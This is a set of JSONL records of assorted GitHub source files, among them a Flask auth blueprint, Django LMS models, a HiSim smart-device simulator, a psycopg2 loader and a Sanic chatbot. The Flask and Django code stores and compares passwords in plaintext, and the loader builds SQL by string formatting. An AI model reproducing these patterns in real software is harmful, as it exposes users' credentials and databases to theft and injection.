wb.answer_frequency_fuzzy(\n # [\"St. Louis Browns\", \"New York Giants\", \"Washington Senators\"])\n\n wb.search_google(\"What are the Bildungsroman genre of stories about\")\n counts = wb.answer_frequency(\n [\"roman empire\", \"coming of age\", \"unrequited love\"])\n counts = wb.answer_frequency_fuzzy(\n [\"roman empire\", \"coming of age\", \"unrequited love\"])\n\n # wb.search_google(\"what was the most downloaded iPhone app of 2016\")\n # counts = wb.answer_frequency([\"snapchat\", \"messenger\", \"pokemon go\"])\n","repo_name":"pickledgator/milliwatson","sub_path":"milliwatson/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":8841,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"40713673659","text":"\"\"\" \nName: Horizontal Tail\nDepartment: Aerodynamics\nLast updated: 05/06/2018 12:45 by Midas\n\"\"\"\n\nimport sys\nimport math as m\nsys.path.append('../')\n\ntoc = 0.09 # Thickness over chord\nx_trl = 0.05 # Transition point lower wing H-tail\nx_tru = 0.05 # Transition point upper wing H-tail\nC_Nh_alpha = 3.2389 # Normal force coefficient H-tail\nVh_v = 0.925 # V-ratio H-tail\ncl_de = 5.34 # Change in C_L due to elevator deflection","repo_name":"DSE23/main","sub_path":"Aircraft/Aerodynamics/HT.py","file_name":"HT.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"36396455149","text":"# s의 길이만큼 반복문을 순회하면서 인덱스 별로 split 후 오름차순 정렬\n\ns = input()\n\nstrings = []\nfor i in range(len(s)):\n strings.append(s[i:]) # 인덱스 별로 정렬 즉, s[0:], s[1:], s[2:], ... , s[len(s)-1:]\n\nfor word in sorted(strings): # 오름차순 정렬 후 출력\n print(word)\n","repo_name":"kimbackdoo/Algorithm","sub_path":"Python/BOJ/정렬/접미사 배열.py","file_name":"접미사 배열.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"22984464784","text":"from flask import Blueprint, request, jsonify, make_response\nfrom pythology.extensions import db\nfrom pythology.models import Student, Admin, Course\n\nauth_bp = Blueprint('auth', __name__)\n\n\n@auth_bp.route('/register', methods=['GET', 'POST'])\ndef register():\n data = request.get_json()\n print('receive data:', data)\n\n res = {}\n model_class = Admin if data['admin'] else Student\n existing_user = model_class.query.get(data['id'])\n print('existing_user:', existing_user)\n\n new_user = None\n if existing_user:\n res['msg'] = \"用户已存在\"\n res['status'] = 0\n else:\n print('model_class:', model_class)\n if data['admin']:\n new_user = Admin(\n id=data['id'],\n username=data['username'],\n password_hash=data['password'],\n school=data['school']\n )\n else:\n new_user = Student(\n id=data['id'],\n username=data['username'],\n password_hash=data['password'],\n gender=data['gender'],\n school=data['school'],\n major=data['major'],\n grade=data['grade']\n )\n\n if new_user:\n db.session.add(new_user)\n db.session.commit()\n res['msg'] = \"注册成功\"\n res['status'] = 1\n\n print('send res:', res)\n return jsonify(res)\n\n\n@auth_bp.route('/login', methods=['GET', 'POST'])\ndef login():\n data = request.get_json()\n print('receive data:', data)\n\n res = {}\n model_class = Admin if data['admin'] else Student\n user = model_class.query.get(data['id'])\n # 判断用户是否存在\n if user:\n # 判断密码是否正确\n if user.password_hash == data['password']:\n res['course'] = [course.to_dict() for course in user.courses]\n res['msg'] = \"登录成功\"\n res['username'] = user.username\n res['school'] = user.school\n res['id'] = user.id\n res['status'] = 1\n if not data['admin']:\n res['major'] = user.major\n res['grade'] = user.grade\n else:\n res['msg'] = \"学工号或密码错误\"\n res['status'] = 0\n else:\n res['msg'] = \"用户不存在,请检查学工号是否正确\"\n res['status'] = 0\n\n print('send res:', res)\n return jsonify(res)","repo_name":"chuanlukk/Pythology-server","sub_path":"pythology/blueprints/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"14899540735","text":"#!/usr/bin/env python3\nimport psycopg2\n\nfrom parse_data import parse_data\nimport json\n\n\ndef main():\n\n parsed_cases = parse_data()\n\n conn = None\n try:\n conn = psycopg2.connect(host=\"localhost\",\n database=\"expunge\",\n port='5432',\n user=\"danielsong\"\n )\n\n cur = conn.cursor()\n\n added_list = []\n\n for parsed_case in parsed_cases:\n # if parsed_case['person_id'] not in added_list:\n # cmd = \"INSERT INTO person (person_id, age) VALUES ({}, {})\".format(\"'\"+parsed_case['person_id']+\"'\", parsed_case['age'])\n # cur.execute(cmd)\n # added_list.append(parsed_case['person_id'])\n\n ##\n # cmd = \"INSERT INTO holds (person_id, case_number) VALUES ({}, {}) ON CONFLICT DO NOTHING\".format(\"'\" + parsed_case['person_id'] + \"'\", \"'\"+parsed_case['case_number']+\"'\")\n\n # if parsed_case['case_number'] not in added_list:\n # cmd = \"INSERT INTO cases(case_number, balance, location, violation_type) VALUES({}, {}, {}, {})\"\\\n # .format(\"'\"+parsed_case['case_number']+\"'\", parsed_case['balance'], \"'\"+parsed_case['location']+\"'\", \"'\"+parsed_case['violation_type']+\"'\")\n # cur.execute(cmd)\n # added_list.append(parsed_case['case_number'])\n for charge in parsed_case['charges']:\n cmd = \"INSERT INTO charges(case_number, eligibility, convicted) VALUES({}, {}, {})\".format(\"'\"+parsed_case['case_number']+\"'\", \"'\"+charge['eligibility']+\"'\", \"'\"+charge['convicted']+\"'\")\n cur.execute(cmd)\n\n\n\n\n conn.commit()\n cur.close()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n\n\nif __name__ == '__main__':\n main()","repo_name":"dsong127/dbFinal","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"23384475852","text":"from django.db import models\nfrom django.core import serializers\n\n\nclass Teacher(models.Model):\n full_name = models.CharField(max_length=100)\n details = models.TextField(null=True)\n email = models.EmailField(max_length=100, unique=True)\n password = models.CharField(max_length=100)\n mobile_no = models.CharField(max_length=20, unique=True)\n qualification = models.CharField(max_length=200)\n skills = models.TextField()\n\n class Meta:\n verbose_name_plural = \"4. Teachers\"\n\n def __str__(self):\n return self.full_name\n\n def skill_list(self):\n skill_list = self.skills.split(',')\n return skill_list\n\n # Total Courses\n def total_teacher_courses(self):\n total_courses = Course.objects.filter(teacher=self).count()\n return total_courses\n\n # Total Chapters\n def total_teacher_chapters(self):\n total_chapters = Chapter.objects.filter(course__teacher=self).count()\n return total_chapters\n\n # Total Students\n def total_teacher_students(self):\n total_students = StudentCourseEnrollment.objects.filter(\n course__teacher=self).count()\n return total_students\n\n#Teacher resume\nclass TeacherResume(models.Model):\n teacher = models.ForeignKey(Teacher, on_delete=models.CASCADE)\n resume=models.FileField()\n \n class Meta:\n verbose_name_plural= \"44. Teacher Resume\"\n\n def __str__(self):\n return self.teacher.full_name\n\n \n\n#Course Category\nclass CourseCategory(models.Model):\n title = models.CharField(max_length=150)\n description = models.TextField()\n\n class Meta:\n verbose_name_plural = \"1. Course Categories\"\n\n def __str__(self):\n return self.title\n\n\nclass Course(models.Model):\n category = models.ForeignKey(CourseCategory, on_delete=models.CASCADE)\n teacher = models.ForeignKey(Teacher, on_delete=models.CASCADE, related_name=\"teacher_courses\")\n title = models.CharField(max_length=150)\n tag_line = models.CharField(max_length=300, null=True)\n description = models.TextField()\n featured_img = models.ImageField(upload_to='course_img/', null=True)\n technologies = models.TextField(null=True)\n\n class Meta:\n verbose_name_plural = \"2. Courses\"\n\n def __str__(self):\n return f\"{self.title} -{self.teacher}\"\n \n def related_videos(self):\n related_videos = Course.objects.filter(technologies__icontains=self.technologies).exclude(id=self.id)\n return serializers.serialize('json', related_videos)\n\n def tech_list(self):\n tech_list = self.technologies.split(',')\n return tech_list\n\n def total_enrolled_students(self):\n total_enrolled_students = StudentCourseEnrollment.objects.filter(course=self).count()\n return total_enrolled_students\n\n # Students enrolled in training\n def training_enrolled_student(self):\n training_enrolled_student = StudentTrainingEnrollment.objects.filter(course=self).count()\n return training_enrolled_student\n\n def course_rating(self):\n course_rating = CourseRating.objects.filter(course=self).aggregate(avg_rating=models.Avg('rating'))\n return course_rating['avg_rating']\n\n # Student enrolled in traiing\n def Student_enrolled_traing(self, course_id):\n Student_enrolled_traing = StudentCourseEnrollment.objects.filter(course=course_id).count()\n\n# Chapter\nclass Chapter(models.Model):\n course = models.ForeignKey(\n Course, on_delete=models.CASCADE, related_name=\"course_chapter\")\n title = models.CharField(max_length=150)\n description = models.TextField()\n video = models.FileField(upload_to='chapter_videos/', null=True)\n note_file = models.FileField(upload_to='Chapter_notes/', null=True)\n remarks = models.TextField()\n\n class Meta:\n verbose_name_plural = \"3. Chapter\"\n\n def __str__(self):\n return self.title\n\n\n# Student\nclass Student(models.Model):\n full_name = models.CharField(max_length=100)\n username = models.CharField(max_length=50, unique=True, null=True)\n email = models.EmailField(max_length=100, unique=True)\n password = models.CharField(max_length=100)\n interests = models.TextField(null=True)\n profile_img=models.ImageField(upload_to='student_profile_imgs/',null=True)\n\n class Meta:\n verbose_name_plural = \"5. Students\"\n\n def __str__(self):\n return self.full_name\n\n # Total Enrolled Courses\n def enrolled_courses(self):\n enrolled_courses = StudentCourseEnrollment.objects.filter(student=self).count()\n return enrolled_courses\n\n # Total Favorite Courses\n def favorites_courses(self):\n favorites_courses = StudentFavoriteCourse.objects.filter(student=self).count()\n return favorites_courses\n\n # Completed Assignments\n def complete_assignments(self):\n complete_assignments = StudentAssignment.objects.filter(\n student=self,student_status=True).count()\n return complete_assignments\n\n # Pending Assignments\n def pending_assignments(self):\n pending_assignments = StudentAssignment.objects.filter(\n student=self,student_status=False).count()\n return pending_assignments\n\n\n# Favorite Course\nclass StudentFavoriteCourse(models.Model):\n course = models.ForeignKey(Course, on_delete=models.CASCADE)\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n status = models.BooleanField(default=False)\n\n class Meta:\n verbose_name_plural = \"9. Favorite Courses\"\n\n def __str__(self):\n return f\"{self.course} - {self.student}\"\n\n\n# Student course enrollment\nclass StudentCourseEnrollment(models.Model):\n course = models.ForeignKey(\n Course, on_delete=models.CASCADE, related_name=\"enrolled_courses\")\n student = models.ForeignKey(\n Student, on_delete=models.CASCADE, related_name=\"enrolled_student\")\n enrolled_time = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n verbose_name_plural = \"6. Student Course Enrollment\"\n\n def __str__(self):\n return f\"{self.course} - {self.student}\"\n\n\n# Course Rating and Reviews\nclass CourseRating(models.Model):\n course = models.ForeignKey(Course, on_delete=models.CASCADE)\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n rating = models.PositiveIntegerField(default=0)\n reviews = models.TextField(null=True)\n review_time = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n verbose_name_plural = \"7. Course Rating\"\n\n def __str__(self):\n return f\"{self.course.title} - {self.rating}\"\n\n\n# Training Details\nclass TrainingDetails(models.Model):\n course = models.ForeignKey(Course, on_delete=models.CASCADE)\n teacher = models.ForeignKey(Teacher, on_delete=models.CASCADE)\n date = models.DateField(\"Date\")\n f_time = models.TimeField(\"Time\")\n t_time = models.TimeField(\"Time\", null=True)\n meeting_link = models.URLField(max_length=200, null=True)\n\n class Meta:\n verbose_name_plural = \"8. Training Details\"\n\n def __str__(self):\n return f\"{self.teacher} - {self.course}\"\n\n # Students enrolled in training\n def training_enrolled_student(self):\n training_enrolled_student = StudentTrainingEnrollment.objects.filter(course=self).count()\n return training_enrolled_student\n\n# Training Enrollment\nclass StudentTrainingEnrollment(models.Model):\n course = models.ForeignKey(Course, on_delete=models.CASCADE, related_name=\"training_courses\")\n student = models.ForeignKey(Student, on_delete=models.CASCADE, related_name=\"training_student\")\n e_time = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n verbose_name_plural = \"90. Training Enrollment\"\n\n def __str__(self):\n return f\"{self.course} - {self.student}\"\n\n def user_course_list(self):\n course_list = models.auth_user.objects.filter(username='admin')\n return course_list\n\n\n\n\n# # Popular Courses\n# class PopularCourses(models.Model):\n# course = models.ForeignKey(Course, on_delete=models.CASCADE)\n# rating = models.ForeignKey(CourseRating, on_delete=models.CASCADE)\n\n# class Meta:\n# verbose_name_plural = \"900. Popular Courses\"\n\n# def __str__(self):\n# return f\"{self.course.title} - {self.rating.rating}\"\n\n\n\n# Assignment\nclass StudentAssignment(models.Model):\n teacher = models.ForeignKey(Teacher, on_delete=models.CASCADE,null=True)\n student = models.ForeignKey(Student, on_delete=models.CASCADE,null=True)\n title = models.CharField(max_length=200)\n detail = models.TextField(null=True)\n student_status = models.BooleanField(default=False, null=True)\n add_time = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n verbose_name_plural = \"55. Student Assignment\"\n\n def __str__(self):\n return f\"{self.title}\"\n \n\n#notification model\nclass Notification(models.Model):\n teacher=models.ForeignKey(Teacher,on_delete=models.CASCADE,null=True)\n student=models.ForeignKey(Student,on_delete=models.CASCADE,null=True)\n notif_subject=models.CharField(max_length=200,verbose_name='Notification Subject',null=True)\n notif_for=models.CharField(max_length=200,verbose_name='Notification For')\n notif_created_time=models.DateTimeField(auto_now_add=True)\n notifread_status=models.BooleanField(default=False,verbose_name='Notification Status')\n\n class Meta:\n verbose_name_plural = \"91. Notifications\"\n\n \n#quiz model\nclass Quiz(models.Model):\n teacher=models.ForeignKey(Teacher,on_delete=models.CASCADE,null=True)\n title=models.CharField(max_length=200)\n detail=models.TextField()\n add_time=models.DateTimeField(auto_now_add=True)\n\n class Meta:\n verbose_name_plural=\"92. Quiz\"\n\n def assign_status(self):\n return CourseQuiz.objects.filter(quiz=self).count()\n \n def __str__(self):\n return f\"{self.title}\"\n\n\n#quiz questions model\nclass QuizQuestions(models.Model):\n quiz=models.ForeignKey(Quiz,on_delete=models.CASCADE,null=True)\n questions=models.CharField(max_length=200)\n ans1=models.CharField(max_length=200)\n ans2=models.CharField(max_length=200)\n ans3=models.CharField(max_length=200)\n ans4=models.CharField(max_length=200)\n right_ans=models.CharField(max_length=200)\n add_time=models.DateTimeField(auto_now_add=True)\n\n class Meta:\n verbose_name_plural=\"93. Quiz Questions\"\n\n\n#Add Quiz to Course\nclass CourseQuiz(models.Model):\n teacher=models.ForeignKey(Teacher,on_delete=models.CASCADE,null=True)\n course=models.ForeignKey(Course,on_delete=models.CASCADE,null=True)\n quiz=models.ForeignKey(Quiz,on_delete=models.CASCADE,null=True)\n add_time=models.DateTimeField(auto_now_add=True)\n\n class Meta:\n verbose_name_plural=\"94. Course Quiz\"\n\n\n#Attempt Quiz question by student\nclass AttempQuiz(models.Model):\n student=models.ForeignKey(Student,on_delete=models.CASCADE,null=True)\n quiz=models.ForeignKey(Quiz,on_delete=models.CASCADE,null=True)\n question=models.ForeignKey(QuizQuestions,on_delete=models.CASCADE,null=True)\n right_ans=models.CharField(max_length=200,null=True)\n add_time=models.DateTimeField(auto_now_add=True)\n\n class Meta:\n verbose_name_plural=\"95. Attempted Questions\"\n\n\nclass StudyMaterial(models.Model):\n course = models.ForeignKey(Course, on_delete=models.CASCADE)\n title = models.CharField(max_length=150)\n description = models.TextField()\n upload = models.FileField(upload_to='study_materials/', null=True)\n remarks = models.TextField(null=True)\n\n class Meta:\n verbose_name_plural = \"96. Course Study Materials\"\n\n","repo_name":"Sudo-Ed-Tech/Edtech","sub_path":"lms_api/eLearning/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"35545177753","text":"\"\"\"Implementation of shiftable household devices like washing machines, dish washers or dryers.\n\nTakes load profiles and time windows, where the activation can be shifted within from LoadProfileGenerator and activates the device when surplus from PV is available.\nThe device is activated at the end of the time window when no surplus was available. This file contains the class SmartDevice and SmartDevice State,\nthe configuration is automatically adopted from the information provided by the LPG.\n\"\"\"\n# clean\n\n# Generic/Built-in\nimport json\nimport math as ma\nfrom os import path\nfrom typing import List\nfrom dataclasses import dataclass\nfrom dataclasses_json import dataclass_json\nimport pandas as pd\n\n\n# Owned\nfrom hisim import component as cp\nfrom hisim import loadtypes as lt\nfrom hisim import utils\nfrom hisim.simulationparameters import SimulationParameters\nfrom hisim.component import OpexCostDataClass\n\n__authors__ = \"Johanna Ganglbauer\"\n__copyright__ = \"Copyright 2021, the House Infrastructure Project\"\n__credits__ = [\"Noah Pflugradt\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = \"Vitor Hugo Bellotto Zago\"\n__email__ = \"vitor.zago@rwth-aachen.de\"\n__status__ = \"development\"\n\n\n@dataclass_json\n@dataclass\nclass SmartDeviceConfig(cp.ConfigBase):\n\n \"\"\"Configuration of the smart device.\"\"\"\n\n @classmethod\n def get_main_classname(cls):\n \"\"\"Returns the full class name of the base class.\"\"\"\n return SmartDevice.get_full_classname()\n\n name: str\n identifier: str\n source_weight: int\n smart_devices_included: bool\n\n @classmethod\n def get_default_config(cls):\n \"\"\"Gets a default config.\"\"\"\n return SmartDeviceConfig(\n name=\"Smart Device\",\n identifier=\"Identifier\",\n source_weight=1,\n smart_devices_included=True,\n )\n\n\nclass SmartDeviceState:\n\n \"\"\"State representing smart appliance.\"\"\"\n\n def __init__(\n self,\n actual_power: float = 0,\n timestep_of_activation: int = -999,\n time_to_go: int = 0,\n position: int = 0,\n ):\n \"\"\"Initilization of state.\n\n :param actual_power: power of smart appliance at given timestep, defaults to 0\n :type actual_power: float, optional\n :param timestep_of_activation: timestep, where the device was activated, defaults to -999\n :type timestep_of_activation: int, optional\n :param time_to_go: duration of the power profile, which follows for the nex time steps, defaults to 0\n :type time_to_go: int, optional\n :param position: index of demand profile relevent for the given timestep, defaults to 0\n :type position: int, optional\n \"\"\"\n self.actual_power = actual_power\n self.timestep_of_activation = timestep_of_activation\n self.time_to_go = time_to_go\n self.position = position\n\n def clone(self) -> \"SmartDeviceState\":\n \"\"\"Copy state efficiently.\"\"\"\n return SmartDeviceState(\n self.actual_power,\n self.timestep_of_activation,\n self.time_to_go,\n self.position,\n )\n\n def run(self, timestep: int, electricity_profile: List[float]) -> None:\n \"\"\"Check device state based on previous time step.\n\n :param timestep: timestep of simulation\n :type timestep: int\n :param electricity_profile: load profile of device for actual or next activation\n :type electricity_profile: List[float]\n \"\"\"\n # device activation\n if timestep > self.timestep_of_activation + self.time_to_go:\n self.timestep_of_activation = timestep\n self.time_to_go = len(electricity_profile)\n self.actual_power = electricity_profile[0]\n\n if timestep < self.timestep_of_activation + self.time_to_go:\n # device is running\n self.actual_power = electricity_profile[\n timestep - self.timestep_of_activation\n ]\n\n # device deactivation\n if timestep == self.timestep_of_activation + self.time_to_go:\n self.position = self.position + 1\n self.time_to_go = 0\n self.actual_power = 0\n\n\nclass SmartDevice(cp.Component):\n\n \"\"\"Smart device class.\n\n Class component that provides availablity and profiles of flexible smart devices like shiftable (in time) washing machines and dishwashers.\n Data provided or based on LPG exports.\n \"\"\"\n\n # mandatory Inputs\n L3DeviceActivation = \"l3_DeviceActivation\"\n\n # mandatory Outputs\n ElectricityOutput = \"ElectricityOutput\"\n\n # optional Inputs\n ElectricityTarget = \"ElectricityTarget\"\n\n def __init__(\n self, my_simulation_parameters: SimulationParameters, config: SmartDeviceConfig\n ):\n \"\"\"Initialize the class.\"\"\"\n\n super().__init__(\n name=config.identifier.replace(\"/\", \"-\") + \"_w\" + str(config.source_weight),\n my_simulation_parameters=my_simulation_parameters,\n my_config=config,\n )\n\n self.build(\n identifier=config.identifier,\n source_weight=config.source_weight,\n seconds_per_timestep=my_simulation_parameters.seconds_per_timestep,\n )\n self.previous_state: SmartDeviceState\n self.state: SmartDeviceState\n self.consumption = 0\n if my_simulation_parameters.surplus_control and config.smart_devices_included:\n postprocessing_flag = [\n lt.InandOutputType.ELECTRICITY_CONSUMPTION_EMS_CONTROLLED,\n lt.ComponentType.SMART_DEVICE,\n ]\n else:\n postprocessing_flag = [\n lt.InandOutputType.ELECTRICITY_CONSUMPTION_UNCONTROLLED\n ]\n\n # mandatory Output\n self.electricity_output_channel: cp.ComponentOutput = self.add_output(\n object_name=self.component_name,\n field_name=self.ElectricityOutput,\n load_type=lt.LoadTypes.ELECTRICITY,\n unit=lt.Units.WATT,\n postprocessing_flag=postprocessing_flag,\n output_description=\"Electricity output\",\n )\n\n self.electricity_target_channel: cp.ComponentInput = self.add_input(\n object_name=self.component_name,\n field_name=self.ElectricityTarget,\n load_type=lt.LoadTypes.ELECTRICITY,\n unit=lt.Units.WATT,\n mandatory=False,\n )\n\n def i_save_state(self) -> None:\n \"\"\"Saves the state.\"\"\"\n self.previous_state = self.state.clone()\n\n def i_restore_state(self) -> None:\n \"\"\"Restores the state.\"\"\"\n self.state = self.previous_state.clone()\n\n def i_doublecheck(self, timestep: int, stsv: cp.SingleTimeStepValues) -> None:\n \"\"\"Doublechecks.\"\"\"\n pass\n\n def i_prepare_simulation(self) -> None:\n \"\"\"Prepares the simulation.\"\"\"\n pass\n\n def i_simulate(\n self, timestep: int, stsv: cp.SingleTimeStepValues, force_convergence: bool\n ) -> None:\n \"\"\"Iteration in smart appliance like washing mashine, dish washer or dryer.\n\n :param timestep: timestep of simulation\n :type timestep: int\n :param stsv: _description_\n :type stsv: cp.SingleTimeStepValues\n :param force_convergence: _description_\n :type force_convergence: bool\n \"\"\"\n\n # initialize power\n self.state.actual_power = 0\n\n # if not already running: check if activation makes sense\n if timestep > self.state.timestep_of_activation + self.state.time_to_go:\n if timestep > self.earliest_start[self.state.position]: # can be turnod on\n # initialize next activation\n activation: float = timestep + 10\n # if surplus controller is connected get related signal\n if self.electricity_target_channel.source_output is not None:\n electricity_target = stsv.get_input_value(self.electricity_target_channel)\n if (\n electricity_target\n >= self.electricity_profile[self.state.position][0]\n ):\n activation = timestep\n # if last possible switch on force activation\n if (\n timestep >= self.latest_start[self.state.position]\n ): # needs to be activated\n activation = timestep\n\n if timestep == activation:\n self.state.run(\n timestep, self.electricity_profile[self.state.position]\n )\n\n # run device if it was already activated\n else:\n self.state.run(timestep, self.electricity_profile[self.state.position])\n\n stsv.set_output_value(self.electricity_output_channel, self.state.actual_power)\n\n def build(\n self, identifier: str, source_weight: int, seconds_per_timestep: int = 60\n ) -> None:\n \"\"\"Initialization of Smart Device information.\n\n :param identifier: name of smart device in LPG\n :type identifier: str\n :param source_weight: priority of smart device in Energy Management System\n :type source_weight: int\n :param seconds_per_timestep: time step size, defaults to 60\n :type seconds_per_timestep: int, optional\n :raises NameError: _description_\n :raises TypeError: _description_\n \"\"\"\n\n # load smart device profile\n smart_device_profile = []\n filepath = path.join(\n utils.HISIMPATH[\"utsp_reports\"], \"FlexibilityEvents.HH1.json\"\n )\n with open(filepath, encoding=\"utf-8\") as file:\n smart_device_profile = json.load(file)\n\n if not smart_device_profile:\n raise NameError(\n \"LPG data for smart appliances is missing or located missleadingly\"\n )\n\n # initializing relevant data\n earliest_start, latest_start, electricity_profile = [], [], []\n\n minutes_per_timestep = seconds_per_timestep / 60\n\n if not minutes_per_timestep.is_integer():\n raise TypeError(\n \"Up to now smart appliances have only been implemented for time resolutions corresponding to multiples of one minute\"\n )\n minutes_per_timestep = int(minutes_per_timestep)\n\n # reading in data from json file and adopting to given time resolution\n for sample in smart_device_profile:\n device_name = str(sample[\"Device\"][\"Name\"])\n if device_name == identifier:\n # earliest start in given time resolution -> integer value\n x_sample = sample[\"EarliestStart\"][\"ExternalStep\"]\n # skip if occurs in calibration days (negative sign )\n if x_sample < 0:\n continue\n # timestep (in minutes) the profile is shifted in the first step of the external time resolution\n offset = minutes_per_timestep - x_sample % minutes_per_timestep\n # earliest start in given time resolution -> float value\n x_sample = x_sample / minutes_per_timestep\n # latest start in given time resolution\n y_sample = sample[\"LatestStart\"][\"ExternalStep\"] / minutes_per_timestep\n # number of timesteps in given time resolution -> integer value\n z_sample = ma.ceil(\n x_sample + sample[\"TotalDuration\"] / minutes_per_timestep\n ) - ma.floor(x_sample)\n # earliest and latest start in new time resolution -> integer value\n earliest_start.append(ma.floor(x_sample))\n latest_start.append(ma.ceil(y_sample))\n\n # get shiftable load profile\n el_shiftable_load = (\n sample[\"Profiles\"][2][\"TimeOffsetInSteps\"] * [0]\n + sample[\"Profiles\"][2][\"Values\"]\n )\n\n # average profiles given in 1 minute resolution to given time resolution\n elem_el = []\n # append first timestep which may not fill the entire 15 minutes\n elem_el.append(sum(el_shiftable_load[:offset]) / offset)\n\n i = 0\n for i in range(z_sample - 2):\n elem_el.append(\n sum(\n el_shiftable_load[\n offset\n + minutes_per_timestep * i: offset\n + (i + 1) * minutes_per_timestep\n ]\n )\n / minutes_per_timestep\n )\n\n last = el_shiftable_load[offset + (i + 1) * minutes_per_timestep:]\n if offset != minutes_per_timestep:\n elem_el.append(sum(last) / (minutes_per_timestep - offset))\n electricity_profile.append(elem_el)\n\n self.source_weight = source_weight\n earliest_start = earliest_start + [\n self.my_simulation_parameters.timesteps\n ] # append value to continue simulation after last necesary run of flexible device at end of year\n self.earliest_start = utils.convert_lpg_timestep_to_utc(\n data=earliest_start,\n year=self.my_simulation_parameters.year,\n seconds_per_timestep=seconds_per_timestep,\n )\n latest_start = latest_start + [\n self.my_simulation_parameters.timesteps + 999\n ] # append value to continue simulation after last necesary run of smart device at end of year\n self.latest_start = utils.convert_lpg_timestep_to_utc(\n data=latest_start,\n year=self.my_simulation_parameters.year,\n seconds_per_timestep=seconds_per_timestep,\n )\n self.electricity_profile = electricity_profile\n self.state = SmartDeviceState()\n self.previous_state = SmartDeviceState()\n\n def write_to_report(self) -> List[str]:\n \"\"\"Writes relevant information to report.\"\"\"\n lines: List[str] = []\n lines.append(f\"DeviceName: {self.component_name}\")\n lines.append(f\"Consumption: {self.consumption:.2f}\")\n return lines\n\n def get_cost_opex(\n self,\n all_outputs: List,\n postprocessing_results: pd.DataFrame,\n ) -> OpexCostDataClass:\n \"\"\"Get opex costs.\"\"\"\n for index, output in enumerate(all_outputs):\n if (\n output.component_name == self.component_name\n and output.load_type == lt.LoadTypes.ELECTRICITY\n ):\n co2_per_unit = 0.4\n euro_per_unit = 0.25\n self.consumption = (\n sum(postprocessing_results.iloc[:, index])\n * self.my_simulation_parameters.seconds_per_timestep\n / 3.6e6\n )\n\n opex_cost_data_class = OpexCostDataClass(\n opex_cost=self.consumption * euro_per_unit,\n co2_footprint=self.consumption * co2_per_unit,\n consumption=self.consumption,\n )\n\n return opex_cost_data_class\n","repo_name":"FZJ-IEK3-VSA/HiSim","sub_path":"hisim/components/generic_smart_device.py","file_name":"generic_smart_device.py","file_ext":"py","file_size_in_byte":15178,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"70"}
+{"seq_id":"43034971498","text":"# Link: https://www.geeksforgeeks.org/shortest-common-supersequence/\n# A dynamic programming based python program \n# to find length of the shortest supersequence\n\n# Returns length of the \n# shortest supersequence of X and Y\n\nimport numpy as np\ndef superSeq(X,Y,n,m,lookup):\n\t\n\tif m==0 or n==0:\n\t\tlookup[n][m] = n+m\n\n\tif (lookup[n][m] == 0):\t \n\t\tif X[n-1]==Y[m-1]:\n\t\t\tlookup[n][m] = superSeq(X,Y,n-1,m-1,lookup)+1\n\t\n\t\telse:\n\t\t\tlookup[n][m] = min(superSeq(X,Y,n-1,m,lookup)+1,\n\t\t\t\t\t\t\tsuperSeq(X,Y,n,m-1,lookup)+1)\n\t\n\treturn lookup[n][m]\n\t\n\n\n# Driver Code\nX = \"AGGTAB\"\nY = \"GXTXAYB\"\n\nlookup = np.zeros([len(X)+1,len(Y)+1])\nprint(\"Length of the shortest supersequence is {}\"\n\t.format(superSeq(X,Y,len(X),len(Y),lookup)))","repo_name":"mohitsaroha03/The-Py-Algorithms","sub_path":"src/zDynamicprogramming/shortest-common-supersequence.py","file_name":"shortest-common-supersequence.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"19923043105","text":"from sanic import Sanic\nfrom sanic.response import json, file\nfrom sanic_session import InMemorySessionInterface\nfrom os.path import join, dirname, realpath\nfrom text_to_speach import text_to_speach\nimport string\nimport random\nimport requests\nimport ujson as j\nimport re\n\n\ndef generator(size=36, chars=string.ascii_uppercase + string.digits + string.ascii_lowercase):\n return ''.join(random.choice(chars) for _ in range(size))\n\ndef clear_sting(string):\n reg = re.compile('[^a-zA-Z ]')\n return ((reg.sub('', string).strip()).lower()).replace(' ', '-')\n\napp = Sanic()\napp.static('/resources', './resources')\nsi = InMemorySessionInterface()\n\n\n@app.middleware('request')\nasync def add_session_to_request(request):\n await si.open(request)\n\n\n@app.middleware('response')\nasync def save_session(request, response):\n await si.save(request, response)\n\n\n@app.route(\"/\")\nasync def test(request):\n response = file(join(dirname(__file__),'websocket.html'))\n if not request['session'].get('sessionid'):\n request['session']['sessionid'] = generator()\n return await response\n\n@app.websocket('/feed')\nasync def feed(request, ws):\n while True:\n question = await ws.recv()\n data = {\n \"question\": question,\n \"sessionid\": request['session']['sessionid']\n }\n r = requests.get('http://localhost:5000/api/v1.0/ask', data)\n if r.status_code is not 200:\n answer = \"Something went wrong\"\n else:\n answer = r.json()['response']['answer']\n filename = clear_sting(answer)[0:143]\n text_to_speach(answer, filename)\n await ws.send(j.dumps({\n \"text\": answer,\n \"filename\": filename\n }))\n\nif __name__ == \"__main__\":\n app.run(\n host=\"0.0.0.0\",\n port=8080,\n debug=True\n 